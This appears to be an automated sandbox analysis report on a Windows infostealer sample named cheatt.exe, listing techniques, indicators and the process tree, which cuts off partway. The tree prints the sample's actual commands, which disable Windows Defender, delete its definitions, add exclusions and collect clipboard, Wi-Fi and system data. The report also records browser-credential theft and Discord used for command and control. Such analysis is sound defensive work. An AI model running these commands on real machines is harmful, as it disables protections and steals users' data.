a3ed7620f4b67ba4a3b9aadea0e6f136c2d1f1d6954bfd1cd2cd5a7a7c459aa1

Analysis

max time kernel
101s
max time network
152s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-it
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-itlocale:it-itos:windows10-ltsc 2021-x64systemwindows
submitted
30-11-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cheatt.exe
Size

7.4MB
MD5

d098528e2d3de4f36359c9f14481830a
SHA1

7203a8373ac6ab096b0dd369bccd745498ff17d4
SHA256

a3ed7620f4b67ba4a3b9aadea0e6f136c2d1f1d6954bfd1cd2cd5a7a7c459aa1
SHA512

f956f584e4df05fbc3023e34664d8dcd8ecf53ec08e48a1e54a86a71f7310c2ce433396603de5ac7159abc7fdbfc824448f66b655af937fcd3b3e39975a5e287
SSDEEP

196608:NG0cD/z3Y2Ljv+bhqNVoBKUh8mz4Iv9P3Ht4+O:Ji/z37L+9qz8/b4IZGt

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4744	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
976	powershell.exe
2188	powershell.exe
1340	powershell.exe
5104	powershell.exe
2180	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cheatt.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1488	cmd.exe
4612	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1112	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe
4596	cheatt.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2812	tasklist.exe
396	tasklist.exe
1220	tasklist.exe
2788	tasklist.exe
3520	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004507a-21.dat	upx
behavioral1/memory/4596-25-0x00007FFFD7D00000-0x00007FFFD82E9000-memory.dmp	upx
behavioral1/files/0x002800000004506d-27.dat	upx
behavioral1/memory/4596-30-0x00007FFFE7930000-0x00007FFFE7953000-memory.dmp	upx
behavioral1/files/0x0028000000045078-31.dat	upx
behavioral1/memory/4596-48-0x00007FFFEF5C0000-0x00007FFFEF5CF000-memory.dmp	upx
behavioral1/files/0x0028000000045074-47.dat	upx
behavioral1/files/0x0028000000045073-46.dat	upx
behavioral1/files/0x0028000000045072-45.dat	upx
behavioral1/files/0x0028000000045071-44.dat	upx
behavioral1/files/0x0028000000045070-43.dat	upx
behavioral1/files/0x002800000004506f-42.dat	upx
behavioral1/files/0x002800000004506e-41.dat	upx
behavioral1/files/0x002800000004506c-40.dat	upx
behavioral1/files/0x002800000004507f-39.dat	upx
behavioral1/files/0x002800000004507e-38.dat	upx
behavioral1/files/0x002800000004507d-37.dat	upx
behavioral1/files/0x0028000000045079-34.dat	upx
behavioral1/files/0x0028000000045077-33.dat	upx
behavioral1/memory/4596-54-0x00007FFFE7900000-0x00007FFFE792D000-memory.dmp	upx
behavioral1/memory/4596-56-0x00007FFFEE9A0000-0x00007FFFEE9B9000-memory.dmp	upx
behavioral1/memory/4596-58-0x00007FFFE7890000-0x00007FFFE78B3000-memory.dmp	upx
behavioral1/memory/4596-60-0x00007FFFE7150000-0x00007FFFE72C7000-memory.dmp	upx
behavioral1/memory/4596-62-0x00007FFFE7FA0000-0x00007FFFE7FB9000-memory.dmp	upx
behavioral1/memory/4596-64-0x00007FFFEE0F0000-0x00007FFFEE0FD000-memory.dmp	upx
behavioral1/memory/4596-66-0x00007FFFE7850000-0x00007FFFE7883000-memory.dmp	upx
behavioral1/memory/4596-69-0x00007FFFE7410000-0x00007FFFE74DD000-memory.dmp	upx
behavioral1/memory/4596-68-0x00007FFFD7D00000-0x00007FFFD82E9000-memory.dmp	upx
behavioral1/memory/4596-72-0x00007FFFE7930000-0x00007FFFE7953000-memory.dmp	upx
behavioral1/memory/4596-73-0x00007FFFD77D0000-0x00007FFFD7CF2000-memory.dmp	upx
behavioral1/memory/4596-76-0x00007FFFE7900000-0x00007FFFE792D000-memory.dmp	upx
behavioral1/memory/4596-77-0x00007FFFE6FB0000-0x00007FFFE6FC4000-memory.dmp	upx
behavioral1/memory/4596-80-0x00007FFFE7810000-0x00007FFFE781D000-memory.dmp	upx
behavioral1/memory/4596-79-0x00007FFFEE9A0000-0x00007FFFEE9B9000-memory.dmp	upx
behavioral1/memory/4596-82-0x00007FFFE7890000-0x00007FFFE78B3000-memory.dmp	upx
behavioral1/memory/4596-83-0x00007FFFD75C0000-0x00007FFFD76DC000-memory.dmp	upx
behavioral1/memory/4596-108-0x00007FFFE7150000-0x00007FFFE72C7000-memory.dmp	upx
behavioral1/memory/4596-179-0x00007FFFE7FA0000-0x00007FFFE7FB9000-memory.dmp	upx
behavioral1/memory/4596-229-0x00007FFFE7850000-0x00007FFFE7883000-memory.dmp	upx
behavioral1/memory/4596-263-0x00007FFFE7410000-0x00007FFFE74DD000-memory.dmp	upx
behavioral1/memory/4596-288-0x00007FFFD77D0000-0x00007FFFD7CF2000-memory.dmp	upx
behavioral1/memory/4596-310-0x00007FFFD7D00000-0x00007FFFD82E9000-memory.dmp	upx
behavioral1/memory/4596-324-0x00007FFFD75C0000-0x00007FFFD76DC000-memory.dmp	upx
behavioral1/memory/4596-316-0x00007FFFE7150000-0x00007FFFE72C7000-memory.dmp	upx
behavioral1/memory/4596-311-0x00007FFFE7930000-0x00007FFFE7953000-memory.dmp	upx
behavioral1/memory/4596-341-0x00007FFFD7D00000-0x00007FFFD82E9000-memory.dmp	upx
behavioral1/memory/4596-355-0x00007FFFD75C0000-0x00007FFFD76DC000-memory.dmp	upx
behavioral1/memory/4596-354-0x00007FFFE7810000-0x00007FFFE781D000-memory.dmp	upx
behavioral1/memory/4596-353-0x00007FFFE6FB0000-0x00007FFFE6FC4000-memory.dmp	upx
behavioral1/memory/4596-352-0x00007FFFD77D0000-0x00007FFFD7CF2000-memory.dmp	upx
behavioral1/memory/4596-351-0x00007FFFE7410000-0x00007FFFE74DD000-memory.dmp	upx
behavioral1/memory/4596-350-0x00007FFFE7850000-0x00007FFFE7883000-memory.dmp	upx
behavioral1/memory/4596-349-0x00007FFFEE0F0000-0x00007FFFEE0FD000-memory.dmp	upx
behavioral1/memory/4596-348-0x00007FFFE7FA0000-0x00007FFFE7FB9000-memory.dmp	upx
behavioral1/memory/4596-347-0x00007FFFE7150000-0x00007FFFE72C7000-memory.dmp	upx
behavioral1/memory/4596-346-0x00007FFFE7890000-0x00007FFFE78B3000-memory.dmp	upx
behavioral1/memory/4596-345-0x00007FFFEE9A0000-0x00007FFFEE9B9000-memory.dmp	upx
behavioral1/memory/4596-344-0x00007FFFE7900000-0x00007FFFE792D000-memory.dmp	upx
behavioral1/memory/4596-343-0x00007FFFEF5C0000-0x00007FFFEF5CF000-memory.dmp	upx
behavioral1/memory/4596-342-0x00007FFFE7930000-0x00007FFFE7953000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2148	cmd.exe
4332	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4604	WMIC.exe
3928	WMIC.exe
5112	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1788	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
192	WMIC.exe
192	WMIC.exe
192	WMIC.exe
192	WMIC.exe
976	powershell.exe
976	powershell.exe
1340	powershell.exe
1340	powershell.exe
4604	WMIC.exe
4604	WMIC.exe
4604	WMIC.exe
4604	WMIC.exe
3928	WMIC.exe
3928	WMIC.exe
3928	WMIC.exe
3928	WMIC.exe
2188	powershell.exe
2188	powershell.exe
2300	WMIC.exe
2300	WMIC.exe
2300	WMIC.exe
2300	WMIC.exe
4612	powershell.exe
4612	powershell.exe
4028	powershell.exe
4028	powershell.exe
4612	powershell.exe
4028	powershell.exe
5104	powershell.exe
5104	powershell.exe
916	powershell.exe
916	powershell.exe
1232	WMIC.exe
1232	WMIC.exe
1232	WMIC.exe
1232	WMIC.exe
384	WMIC.exe
384	WMIC.exe
384	WMIC.exe
384	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
2180	powershell.exe
2180	powershell.exe
5112	WMIC.exe
5112	WMIC.exe
5112	WMIC.exe
5112	WMIC.exe
4788	powershell.exe
4788	powershell.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1220	tasklist.exe
Token: SeIncreaseQuotaPrivilege	192	WMIC.exe
Token: SeSecurityPrivilege	192	WMIC.exe
Token: SeTakeOwnershipPrivilege	192	WMIC.exe
Token: SeLoadDriverPrivilege	192	WMIC.exe
Token: SeSystemProfilePrivilege	192	WMIC.exe
Token: SeSystemtimePrivilege	192	WMIC.exe
Token: SeProfSingleProcessPrivilege	192	WMIC.exe
Token: SeIncBasePriorityPrivilege	192	WMIC.exe
Token: SeCreatePagefilePrivilege	192	WMIC.exe
Token: SeBackupPrivilege	192	WMIC.exe
Token: SeRestorePrivilege	192	WMIC.exe
Token: SeShutdownPrivilege	192	WMIC.exe
Token: SeDebugPrivilege	192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	192	WMIC.exe
Token: SeRemoteShutdownPrivilege	192	WMIC.exe
Token: SeUndockPrivilege	192	WMIC.exe
Token: SeManageVolumePrivilege	192	WMIC.exe
Token: 33	192	WMIC.exe
Token: 34	192	WMIC.exe
Token: 35	192	WMIC.exe
Token: 36	192	WMIC.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeIncreaseQuotaPrivilege	192	WMIC.exe
Token: SeSecurityPrivilege	192	WMIC.exe
Token: SeTakeOwnershipPrivilege	192	WMIC.exe
Token: SeLoadDriverPrivilege	192	WMIC.exe
Token: SeSystemProfilePrivilege	192	WMIC.exe
Token: SeSystemtimePrivilege	192	WMIC.exe
Token: SeProfSingleProcessPrivilege	192	WMIC.exe
Token: SeIncBasePriorityPrivilege	192	WMIC.exe
Token: SeCreatePagefilePrivilege	192	WMIC.exe
Token: SeBackupPrivilege	192	WMIC.exe
Token: SeRestorePrivilege	192	WMIC.exe
Token: SeShutdownPrivilege	192	WMIC.exe
Token: SeDebugPrivilege	192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	192	WMIC.exe
Token: SeRemoteShutdownPrivilege	192	WMIC.exe
Token: SeUndockPrivilege	192	WMIC.exe
Token: SeManageVolumePrivilege	192	WMIC.exe
Token: 33	192	WMIC.exe
Token: 34	192	WMIC.exe
Token: 35	192	WMIC.exe
Token: 36	192	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1340	powershell.exe
Token: SeSecurityPrivilege	1340	powershell.exe
Token: SeTakeOwnershipPrivilege	1340	powershell.exe
Token: SeLoadDriverPrivilege	1340	powershell.exe
Token: SeSystemProfilePrivilege	1340	powershell.exe
Token: SeSystemtimePrivilege	1340	powershell.exe
Token: SeProfSingleProcessPrivilege	1340	powershell.exe
Token: SeIncBasePriorityPrivilege	1340	powershell.exe
Token: SeCreatePagefilePrivilege	1340	powershell.exe
Token: SeBackupPrivilege	1340	powershell.exe
Token: SeRestorePrivilege	1340	powershell.exe
Token: SeShutdownPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeSystemEnvironmentPrivilege	1340	powershell.exe
Token: SeRemoteShutdownPrivilege	1340	powershell.exe
Token: SeUndockPrivilege	1340	powershell.exe
Token: SeManageVolumePrivilege	1340	powershell.exe
Token: 33	1340	powershell.exe
Token: 34	1340	powershell.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe
1020	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 4596	3416	cheatt.exe	81
PID 3416 wrote to memory of 4596	3416	cheatt.exe	81
PID 4596 wrote to memory of 3036	4596	cheatt.exe	82
PID 4596 wrote to memory of 3036	4596	cheatt.exe	82
PID 4596 wrote to memory of 3064	4596	cheatt.exe	83
PID 4596 wrote to memory of 3064	4596	cheatt.exe	83
PID 4596 wrote to memory of 2476	4596	cheatt.exe	84
PID 4596 wrote to memory of 2476	4596	cheatt.exe	84
PID 4596 wrote to memory of 4588	4596	cheatt.exe	88
PID 4596 wrote to memory of 4588	4596	cheatt.exe	88
PID 3036 wrote to memory of 976	3036	cmd.exe	91
PID 3036 wrote to memory of 976	3036	cmd.exe	91
PID 2476 wrote to memory of 1220	2476	cmd.exe	90
PID 2476 wrote to memory of 1220	2476	cmd.exe	90
PID 4588 wrote to memory of 192	4588	cmd.exe	92
PID 4588 wrote to memory of 192	4588	cmd.exe	92
PID 3064 wrote to memory of 1340	3064	cmd.exe	93
PID 3064 wrote to memory of 1340	3064	cmd.exe	93
PID 4596 wrote to memory of 4332	4596	cheatt.exe	136
PID 4596 wrote to memory of 4332	4596	cheatt.exe	136
PID 4332 wrote to memory of 4292	4332	cmd.exe	98
PID 4332 wrote to memory of 4292	4332	cmd.exe	98
PID 4596 wrote to memory of 1656	4596	cheatt.exe	99
PID 4596 wrote to memory of 1656	4596	cheatt.exe	99
PID 1656 wrote to memory of 1316	1656	cmd.exe	101
PID 1656 wrote to memory of 1316	1656	cmd.exe	101
PID 4596 wrote to memory of 4100	4596	cheatt.exe	102
PID 4596 wrote to memory of 4100	4596	cheatt.exe	102
PID 4100 wrote to memory of 4604	4100	cmd.exe	104
PID 4100 wrote to memory of 4604	4100	cmd.exe	104
PID 4596 wrote to memory of 3904	4596	cheatt.exe	105
PID 4596 wrote to memory of 3904	4596	cheatt.exe	105
PID 3904 wrote to memory of 3928	3904	cmd.exe	107
PID 3904 wrote to memory of 3928	3904	cmd.exe	107
PID 4596 wrote to memory of 3976	4596	cheatt.exe	108
PID 4596 wrote to memory of 3976	4596	cheatt.exe	108
PID 3064 wrote to memory of 4744	3064	cmd.exe	110
PID 3064 wrote to memory of 4744	3064	cmd.exe	110
PID 3976 wrote to memory of 2188	3976	cmd.exe	111
PID 3976 wrote to memory of 2188	3976	cmd.exe	111
PID 4596 wrote to memory of 1936	4596	cheatt.exe	112
PID 4596 wrote to memory of 1936	4596	cheatt.exe	112
PID 4596 wrote to memory of 2928	4596	cheatt.exe	113
PID 4596 wrote to memory of 2928	4596	cheatt.exe	113
PID 1936 wrote to memory of 2788	1936	cmd.exe	116
PID 1936 wrote to memory of 2788	1936	cmd.exe	116
PID 4596 wrote to memory of 2724	4596	cheatt.exe	203
PID 4596 wrote to memory of 2724	4596	cheatt.exe	203
PID 4596 wrote to memory of 8	4596	cheatt.exe	119
PID 4596 wrote to memory of 8	4596	cheatt.exe	119
PID 4596 wrote to memory of 1488	4596	cheatt.exe	120
PID 4596 wrote to memory of 1488	4596	cheatt.exe	120
PID 4596 wrote to memory of 4880	4596	cheatt.exe	121
PID 4596 wrote to memory of 4880	4596	cheatt.exe	121
PID 2928 wrote to memory of 3520	2928	cmd.exe	125
PID 2928 wrote to memory of 3520	2928	cmd.exe	125
PID 4596 wrote to memory of 2148	4596	cheatt.exe	126
PID 4596 wrote to memory of 2148	4596	cheatt.exe	126
PID 4596 wrote to memory of 1332	4596	cheatt.exe	127
PID 4596 wrote to memory of 1332	4596	cheatt.exe	127
PID 4596 wrote to memory of 2344	4596	cheatt.exe	129
PID 4596 wrote to memory of 2344	4596	cheatt.exe	129
PID 4596 wrote to memory of 2720	4596	cheatt.exe	131
PID 4596 wrote to memory of 2720	4596	cheatt.exe	131

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
852	attrib.exe
4644	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cheatt.exe
"C:\Users\Admin\AppData\Local\Temp\cheatt.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Users\Admin\AppData\Local\Temp\cheatt.exe
  "C:\Users\Admin\AppData\Local\Temp\cheatt.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheatt.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheatt.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1340
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2724
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:8
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2148
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1332
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2344
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:640
- - C:\Windows\system32\cmd.exe
